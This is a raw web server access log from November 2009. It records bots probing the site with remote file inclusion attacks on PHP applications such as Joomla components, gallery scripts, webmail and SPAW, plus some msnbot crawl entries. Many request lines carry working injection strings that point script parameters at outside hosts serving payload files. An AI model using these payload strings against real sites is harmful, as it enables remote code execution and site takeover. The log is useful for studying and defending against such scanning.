216.199.232.112 - - [14/Nov/2009:01:23:02 -0600] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:23:12 -0600] "GET /logs/access_log.1250726400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:23:25 -0600] "GET /logs/access_log.1250726400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:08 -0600] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:08 -0600] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:08 -0600] "GET /logs/access_log.1240012800//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:13 -0600] "GET /logs//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:13 -0600] "GET //bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 314 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:16 -0600] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:16 -0600] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:16 -0600] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:18 -0600] "GET /logs/access_log.1240012800//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:20 -0600] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 345 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:20 -0600] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 350 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:20 -0600] "GET /logs/access_log.1253404800//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:30 -0600] "GET /logs/access_log.1243036800//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.73.17.7 - - [14/Nov/2009:01:24:32 -0600] "GET /logs/access_log.1243036800//bbs/include/print_category.php?setup%5Buse_category%5D=1&dir=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:32 -0600] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:32 -0600] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:24:32 -0600] "GET /logs/access_log.1252281600//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
65.55.106.232 - - [14/Nov/2009:01:25:14 -0600] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
65.55.207.53 - - [14/Nov/2009:01:25:24 -0600] "GET /logs/access_log.1154995200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.199.232.112 - - [14/Nov/2009:01:25:31 -0600] "GET /logs/access_log.1252281600//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:25:31 -0600] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:25:31 -0600] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:25:45 -0600] "GET /logs/access_log.1254009600//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:25:48 -0600] "GET //administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:25:48 -0600] "GET /logs//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:25:48 -0600] "GET /logs/access_log.1252281600//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:49 -0600] "GET /logs/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:49 -0600] "GET /logs/access_log.1250035200/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:49 -0600] "GET /setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:49 -0600] "GET /logs/access_log.1241136000/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:50 -0600] "GET /logs/access_log.1250035200/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:50 -0600] "GET /setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:50 -0600] "GET /logs/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:25:50 -0600] "GET /logs/access_log.1241136000/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
65.55.106.232 - - [14/Nov/2009:01:25:54 -0600] "GET /logs/access_log.1166832000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.34.111.74 - - [14/Nov/2009:01:26:01 -0600] "GET /logs/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:26:01 -0600] "GET /setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:26:01 -0600] "GET /logs/access_log.1241136000/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:26:01 -0600] "GET /logs/access_log.1230249600/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:26:02 -0600] "GET /logs/access_log.1230249600/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:26:02 -0600] "GET /setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 292 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:26:02 -0600] "GET /logs/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:26:02 -0600] "GET /logs/access_log.1241136000/setup.php?dir=http://neox.com.ua/id1.txt? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:26:03 -0600] "GET /logs/access_log.1250726400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:01:26:04 -0600] "GET /error.php?setup[use_category]=1&dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:01:26:06 -0600] "GET /logs/error.php?setup[use_category]=1&dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
157.100.230.82 - - [14/Nov/2009:01:26:06 -0600] "GET /logs/access_log.1250899200/error.php?setup[use_category]=1&dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:26:08 -0600] "GET /logs/access_log.1254009600//administrator/components/com_x-shop/admin.x-shop.php?mosConfig_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 363 "-""Mozilla/5.0"
216.199.232.112 - - [14/Nov/2009:01:26:15 -0600] "GET /logs/access_log.1250726400//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://users.rcn.com/t.goss/pid.txt??? HTTP/1.1" 404 372 "-""Mozilla/5.0"
65.55.106.131 - - [14/Nov/2009:01:26:57 -0600] "GET /logs/access_log.1221264000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
115.68.4.56 - - [14/Nov/2009:01:30:00 -0600] "GET /logs//skin/rosun_comm2_gallery/setup.php?dir=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:30:00 -0600] "GET //skin/rosun_comm2_gallery/setup.php?dir=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:30:06 -0600] "GET /logs//skin/rosun_comm2_gallery/setup.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:30:06 -0600] "GET //skin/rosun_comm2_gallery/setup.php?dir=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
64.34.111.74 - - [14/Nov/2009:01:31:01 -0600] "GET /logs/access_log.1251676800////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:01 -0600] "GET /logs/access_log.1250294400////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:01 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:07 -0600] "GET /logs/access_log.1250035200////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:07 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:07 -0600] "GET /logs/access_log.1251676800////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:09 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:09 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 212727 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:10 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:10 -0600] "GET /logs/access_log.1250294400////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:10 -0600] "GET /logs/access_log.1251676800////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:11 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 212727 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:13 -0600] "GET ////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:13 -0600] "GET /logs/access_log.1250035200////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:13 -0600] "GET /logs/access_log.1251676800////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
64.34.111.74 - - [14/Nov/2009:01:31:14 -0600] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://neox.com.ua/id1.txt? HTTP/1.1" 200 212727 "-""Mozilla/5.0"
62.103.31.24 - - [14/Nov/2009:01:32:34 -0600] "GET /error.php?setup[use_category]=1&dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
62.103.31.24 - - [14/Nov/2009:01:32:34 -0600] "GET /logs/access_log.1250899200/error.php?setup[use_category]=1&dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
62.103.31.24 - - [14/Nov/2009:01:32:34 -0600] "GET /logs/error.php?setup[use_category]=1&dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
62.103.31.24 - - [14/Nov/2009:01:33:22 -0600] "GET /logs/access_log.1250985600/error.php?setup[use_category]=1&dir=http://190.81.28.182/incaware/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:36:20 -0600] "GET /com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:36:20 -0600] "GET /logs/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:36:20 -0600] "GET /logs/access_log.1242950400/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:36:20 -0600] "GET /logs/access_log.1253404800/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
115.68.4.56 - - [14/Nov/2009:01:36:48 -0600] "GET /logs//themes/default/index.php?main=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:36:48 -0600] "GET //themes/default/index.php?main=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:36:49 -0600] "GET /logs//themes/default/index.php?main=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:36:49 -0600] "GET //themes/default/index.php?main=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
74.86.17.106 - - [14/Nov/2009:01:37:08 -0600] "GET /logs/access_log.1254096000/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:01:37:46 -0600] "GET /logs/access_log.1250812800//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:01:37:46 -0600] "GET //?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:01:37:46 -0600] "GET /logs/access_log.1250294400//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:01:37:46 -0600] "GET /logs/access_log.1241913600//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:37:47 -0600] "GET /logs/access_log.1242950400/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:37:47 -0600] "GET /logs/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:37:47 -0600] "GET /logs/access_log.1253404800/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
74.86.17.106 - - [14/Nov/2009:01:37:47 -0600] "GET /com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 313 "-""Mozilla/5.0"
61.100.181.217 - - [14/Nov/2009:01:37:48 -0600] "GET /logs//?path%5Bdocroot%5D=http://www.hyonsvc.co.kr//bbs/upload/id1.txt??? HTTP/1.1" 200 212725 "-""Mozilla/5.0"
65.55.207.102 - - [14/Nov/2009:01:37:55 -0600] "GET /logs/access_log.1184889600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.217.226.100 - - [14/Nov/2009:01:38:36 -0600] "GET //skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.831"
124.217.226.100 - - [14/Nov/2009:01:38:36 -0600] "GET /logs/access_log.1250035200//skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.831"
124.217.226.100 - - [14/Nov/2009:01:38:36 -0600] "GET /logs/access_log.1251936000//skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.831"
124.217.226.100 - - [14/Nov/2009:01:38:36 -0600] "GET /logs//skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.831"
74.86.17.106 - - [14/Nov/2009:01:38:51 -0600] "GET /logs/access_log.1254096000/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://tutku.ru/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
115.68.4.56 - - [14/Nov/2009:01:39:47 -0600] "GET /?base_folder=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:39:49 -0600] "GET /logs/?base_folder=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 200 212720 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:40:37 -0600] "GET /?base_folder=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 3245 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:40:39 -0600] "GET /logs/?base_folder=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 200 212720 "-""libwww-perl/5.805"
70.38.112.174 - - [14/Nov/2009:01:43:04 -0600] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.qqe.ru/forum/Themes/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
70.38.112.174 - - [14/Nov/2009:01:43:04 -0600] "GET /logs/access_log.1251504000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.qqe.ru/forum/Themes/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
70.38.112.174 - - [14/Nov/2009:01:43:04 -0600] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.qqe.ru/forum/Themes/id1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
70.38.112.174 - - [14/Nov/2009:01:43:04 -0600] "GET /logs/access_log.1250294400/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.qqe.ru/forum/Themes/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
70.38.112.174 - - [14/Nov/2009:01:43:20 -0600] "GET /logs/access_log.1251072000/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.qqe.ru/forum/Themes/id1.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
115.68.4.56 - - [14/Nov/2009:01:43:31 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:43:31 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://dheni.fileave.com/xxx.txt???? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:43:52 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
115.68.4.56 - - [14/Nov/2009:01:43:52 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://www.easyman.com.tw/na3/sempak.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
66.160.144.159 - - [14/Nov/2009:01:48:46 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:48:46 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:48:46 -0600] "GET /logs/access_log.1233964800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:48:46 -0600] "GET /logs/access_log.1236643200//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:48:46 -0600] "GET /logs/access_log.1236124800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:48 -0600] "GET /logs/access_log.1233964800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET //admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs/access_log.1236643200//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs/access_log.1236124800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs/access_log.1246579200//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs/access_log.1235692800//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs/access_log.1244592000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs/access_log.1242432000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
66.160.144.159 - - [14/Nov/2009:01:52:49 -0600] "GET /logs/access_log.1242000000//admin/includes/spaw/spaw_control.class.php?spaw_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
65.55.207.98 - - [14/Nov/2009:01:54:55 -0600] "GET /logs/access_log.1146355200 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.75.82 - - [14/Nov/2009:01:56:16 -0600] "GET /logs/access_log.1250035200//skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
91.121.75.82 - - [14/Nov/2009:01:56:16 -0600] "GET //skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
91.121.75.82 - - [14/Nov/2009:01:56:16 -0600] "GET /logs//skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
91.121.75.82 - - [14/Nov/2009:01:56:17 -0600] "GET /logs/access_log.1252108800//skin/rosun_comm2_gallery/setup.php?dir=http://videochatbuilder.com/id3.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.803"
